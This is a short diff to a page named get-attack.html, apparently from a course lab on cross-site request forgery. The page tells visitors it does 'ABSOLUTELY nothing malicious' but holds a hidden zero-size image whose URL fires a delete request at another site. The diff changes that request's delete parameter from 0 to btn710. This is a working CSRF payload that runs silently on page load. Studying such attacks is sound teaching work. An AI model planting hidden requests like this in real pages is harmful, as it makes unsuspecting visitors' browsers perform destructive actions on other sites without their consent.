--- a/attack/get-attack.html
+++ b/attack/get-attack.html
@@ -15,7 +15,7 @@
 
     <p>
       Believe or not, this page does ABSOLUTELY nothing malicious. :-)
-      <img src="http://www.bradchen.com/btn710-a2/sample/index.php?delete=0"
+      <img src="http://www.bradchen.com/btn710-a2/sample/index.php?delete=btn710"
         style="width: 0; height: 0;" />
     </p>
   </body>
